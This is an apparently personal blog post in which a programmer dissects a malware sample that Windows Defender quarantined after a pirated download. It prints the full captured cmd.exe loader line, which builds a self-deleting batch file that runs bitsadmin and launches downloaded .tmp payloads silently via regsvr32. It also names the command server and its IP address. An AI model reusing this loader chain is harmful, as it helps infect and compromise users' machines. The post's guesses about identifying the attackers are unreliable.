For most people when they see ‘Threat found’ notification, they simply let their trusted antivirus to take care of it. Well, being a curious programmer, I decided to have a look at the quarantined virus.
This the journey as i decipher a malware that i found on my PC and get to the real identity of my Hackers. So come along for the ride.
Where it all started.
What happens when you want a piece of software/music but have no cash to spare?
You get it on thepiratebay3.org 👍
No, just kidding, you should never download any software/music from piratebay or any other torrent sites 😀
For this is what will happen to you
I started getting persistent notifications of ‘Threat found’. Immediately I stopped the installation and did a quick scan. After that, I updated windows defender and made a full scan.
3 days later and i’m still getting ‘Threat found’ notification.
That was odd as I always did daily updates and after that, I would do a quick scan. So I did what any other regular Joe would do and had another quick scan, then did a full scan and finally had an offline scan but still got the same notification, ‘Windows defender has found a new threat’.
Being a curious programmer, I decided to have a look at the malware’s source code in the windows defender quarantine section.
Hmm... That’s interesting 🤔, how comes windows have not yet been able to solve this issue and the source code is right there in front of my eyes.
CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe “cmd.exe” /c start /min cmd /c “(echo @echo off > “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo bitsadmin /complete a1e62b52–3bf5–0 ^> nul >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo bitsadmin /cancel a1e62b52–3bf5–0 ^> nul >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo if exist “C:\ProgramData\a1e62b52–3bf5–0\a1e62b52–3bf5–0.d” goto q >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & for /f %i in (‘dir /a:-d /b /w “C:\ProgramData\a1e62b52–3bf5–0\*.tmp”’) do (echo start /b /min regsvr32.exe /s /n /i:”!=47468f40a1e62b53 “ “C:\ProgramData\a1e62b52–3bf5–0\%i” >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat”)) > nul & echo :q >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo start /b /min regsvr32.exe /s /n /i:”!=47468f40a1e62b53 “ “C:\ProgramData\a1e62b52–3bf5–0\a1e62b52–3bf5–0.d” >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & echo del “C:\ProgramData\a1e62b52–3bf5–0\x.bat” ^& exit >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat” & “C:\ProgramData\a1e62b52–3bf5–0\x.bat””
\cmd.exe “cmd.exe” /c start /min cmd /
This code would result in the script starting a small command prompt to run a script then close on completion.
This happens so fast that you would hardly notice it.
Second Clue: (Bitsadmin)
Is this some sort of admin or is the script accessing my admin privileges and spying on me? Sending my data to some remote server in Russia? Or is my data being sold to some Indian scammers in Mumbai?
Let's keep going…
& echo if exist “C:\ProgramData\a1e62b52–3bf5–0\a1e62b52–3bf5–0.d”
Hmm.. seems like the script is looking for the existence of a file in this directory
The next piece of code is:
goto q >> “C:\ProgramData\a1e62b52–3bf5–0\x.bat”
This implies: on the existence of the file, proceed to the directory below.
& for /f %i in (‘dir /a:-d /b /w “C:\ProgramData\a1e62b52–3bf5–0\*.tmp
The script looks into the directory below:
Then loops over all the files looking for any file with the extension *tmp
Then runs this code:
do (echo start /b /min regsvr32.exe
This is where it starts a small command prompt and runs this program: regsvr32.exe
regsvr32.exe is a windows program that’s used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.
So let's go to the file location.
Guess what we find? BIT3D39.tmp
Let's keep going…
Fifth Clue (Opening the Trojan file)
Let's have a look at how glorified hackers write malware code 😎.
Let's break it down, should be fun 😉
Sixth Clue (metadata)
<meta http-equiv=pragma content=nocache>
<META HTTP-EQUIV=Expires CONTENT=-1>
This code snippet means that the hackers don’t want to cache any data on your computer’s memory. The reason may be because they need to run the latest script every time the malware updates.
Seventh Clue ( auto-submit function)
When the script runs, it submits the form to this API endpoint by making a POST request. By looking at the endpoint you can know that the hacker’s back-end is written in Java programming language (.jsp). This would actually mean that the script is either:
i. Uploading my data to the hacker’s remote server or
ii. My computer is in constant connection to the hacker’s server.
Curious to know where the data ends up?
I place the URL on my browser and this is what I get.
The server is down! That’s good news. They must have been taken down. But that’s not quite.
I decide to go even deeper into the rabbit hole in order to get the server’s info.
Server Info ( http://domenjob.com)
I head over to IP checker to get the full server details and this is what i find:
IP Address: 184.108.40.206
Geolocation: NL (Netherlands)
So the server is located in the Netherlands and now we have the public IP. That’s close enough to find their identity.
So they have not been shut down but have temporarily shut it down since their registry expires in 2019.
Registrar Abuse Contact Email: email@example.com
Registrar Abuse Contact Phone: +16502620100
Now we have the contacts to report the Hackers.
To be continued…